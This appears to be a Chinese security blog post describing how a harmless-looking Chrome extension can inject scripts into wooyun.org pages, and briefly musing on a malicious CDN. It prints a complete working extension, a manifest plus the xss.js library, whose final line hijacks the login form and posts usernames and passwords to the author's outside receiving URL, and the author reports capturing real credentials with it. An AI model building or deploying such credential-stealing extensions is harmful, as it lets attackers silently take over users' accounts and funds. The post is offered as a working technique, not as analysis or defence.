0x00 Chrome插件

--------------------------

这个想法是昨天看到@紫梦芊 的帖子想起来的。

想法如下:

Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?

于是,开始实践。(为了方便,只是弹了一个小框框)。

Manifest.json内容:

{
  "name": "XiaoChaJian",
  "version": "1.0",
  "manifest_version": 2,
  "author":"VIP",
  "icons": {
      "128": "icon.png"
   },
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  "content_scripts": [
    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}
   ]
}

contentscript.js内容:

alert(/xss/);

利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践

那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?

很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?

开始实践:

Manifest.json内容:

{
  "name": "JieChiBiaoDan",
  "version": "1.0",
  "manifest_version": 2,


"author":"VIP",
  "icons": {
      "128": "icon.png"


},
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],


"content_scripts": [
    {"js":["contentscript.js"],"matches":

["http://wooyun.org/user.php?

action=login*","http://www.wooyun.org/user.php?action=login*"]}


]
}

contentscript.js内容:

;;var xss = function(){
  var x = {
    'name':'xss.js',
    'version':'0.2.1',
    'author':'长短短(sogili)'
  };

  x.x=function(id){return document.getElementById(id)};

  //容错取值
  x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};

  //浏览器
  x.i={
    i:!!self.ActiveXObject&&(function(){
      for(var v=6,s=document.createElement('s');
        s.innerHTML='<![if gt IE '+(v++)+']

><i></i><![endif]-->',
        s.getElementsByTagName('i')[0];);
      return v;
    }()),
    c:!!self.chrome,
    f:self.mozPaintCount>-1,
    o:!!self.opera,
    s:!self.chrome&&!!self.WebKitPoint
  };

  //UA
  x.ua = navigator.userAgent;

  //判断是否为苹果手持设备
  x.apple=/ip(one|ad|od)/i.test(x.ua);

  //随机数
  x.rdm=function(){return~~(Math.random()*1e5)};

  //url编码(UTF8)
  x.ec=encodeURIComponent;

  x.html=function(){
    return document.getElementsByTagName('html')[0]
        ||document.write('<html>')
        ||document.getElementsByTagName

('html')[0];
  };

  /*
   * 销毁一个元素
   */
  x.kill=function(e){
    e.parentElement.removeChild(e);
  };

  /*
   *绑定事件
   */
  x.bind=function(e,name,fn){
    e.addEventListener?e.addEventListener

(name,fn,false):e.attachEvent("on"+name,fn);
  };

  /*
   * dom准备完毕时执行函数
   */
  x.ready=function(fn){
    if(!x.i.i){
      x.bind(document,'DOMContentLoaded',fn);
    }else{
      var s = setInterval(function(){
        try{
          document.body.doScroll('left');
          clearInterval(s);
          fn();
        }catch(e){}
      },4);
    }
  }

  /*
   * 同源检测
   */
  x.o=function(url){
    var link = x.dom('<a href="'+encodeURI(url)+'">',1);
    return link.protocol+link.hoatname+':'+(link.port||80)

==location.protocol+location.hoatname+':'+(location.port||80);
  };

  /*
   * html to dom
   */
  x.dom=function(html,gcsec){
    var tmp = document.createElement('span');
    tmp.innerHTML=html;
    var e = tmp.children[0];
    e.style.display='none';
    x.html().appendChild(e);
    gcsec>>0>0&&setTimeout(function(){
      x.kill(e);
    },gcsec*1000);
    return e;
  };

  /*
   * ajax
   */
  x.ajax=function(url,params,callback){
    (params instanceof Function)&&

(callback=params,params=void(0));
    var XHR = (!x.o(url)&&window.XDomainRequest)||
          window.XMLHttpRequest||
          (function(){return new ActiveXObject

('MSXML2.XMLHTTP')});
    var xhr = new XHR();
    xhr.open(params?'post':'get',url);
    xhr.withCredentials = true;
    try{params&&xhr.setRequestHeader('content-

type','application/x-www-form-urlencoded');}catch(e){}
    callback&&(xhr.onreadystatechange = function() {
      (this.readyState == 4 && ((this.status >= 200

&& this.status <= 300) || this.status == 304))&&callback.apply

(this,arguments);
    });
    xhr.send(params);
  };

  /*
   * CSRF
   */
  x.csrf=function(url,params,callback){
    (params instanceof Function)&&

(callback=params,params=void(0));
    if(params){
      var form = x.dom('<form method=post>');
      form.action=url;
      for(var name in params){
        var input = document.createElement

('input');
        input.name=name;
        input.value=params[name];
        form.appendChild(input);
      }
      var iframe = x.dom('<iframe sandbox

name=_'+x.rdm()+'_>',6);
      callback&&setTimeout(function(){
        x.bind(iframe,'load',callback);
      },30);
      form.target=iframe.name;
      form.submit();
    }else{
      var img = new Image();
      callback&&(img.onerror=callback);
      img.src=url;
    }
  };

  /*
   * 表单劫持
   */
  x.xform=function(form,action){


form.old_action=form.action,form.old_target=form.target,form.action=act

ion;
    var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');
    form.target=iframe.name;
    setTimeout(function(){
      x.bind(iframe,'load',function(){


form.action=form.old_action,form.target=form.old_target,form.onsubmit=n

ull,form.submit();
      });
    },30);
  };

  /*
   * 函数代理
   */
  x.proxy=function(fn,before,after){
    return function(){
      before&&before.apply(this,arguments);
      var result = fn.apply(this,arguments);
      after&&after.apply(this,arguments);
      return result;
    }
  };

  return x;
}();
xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');//劫持表单

http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践

再去看看,用户名密码已经躺在那里了。

利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。

0x01 CDN

---------------

现在有许许多多的网站使用了CDN来进行加速/防D等。

去搜索了下CDN的工作原理,大概是这样的。

用户访问-》自动分配最快的节点-》请求原服务器-------

返回给用户《-返回给节点服务器《-原服务器返回数据<-|

那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?

这个就没办法实践了,去搜索了一个相关案例:

http://wooyun.org/bugs/wooyun-2010-016562

更多猥琐想法欢迎补充~

[原文地址]